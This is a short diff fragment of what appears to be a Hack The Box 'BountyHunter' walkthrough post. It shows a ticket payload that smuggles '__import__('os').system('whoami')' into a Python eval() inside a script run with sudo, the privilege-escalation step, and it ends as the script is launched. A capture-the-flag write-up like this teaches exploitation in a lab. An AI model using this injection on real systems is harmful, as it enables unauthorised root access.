jcseals/jcseals.github.io/_posts/2021-11-20-htb-bountyhunter-walkthrough.md

 **186+1==187 and __import__('os').system('whoami') == True
 ```

-We hit all the requirements and our magic number and whoami commands are evaluated as conditions which is required since we're inside eval().
+We hit all the requirements and our magic number and whoami command expressions are evaluated which is required since we're inside eval().
 Let's run the ticketValidator.py with sudo and pass in our ticket:
 ```text
 development@bountyhunter:/opt/skytrain_inc$ sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
 Please enter the path to the ticket file.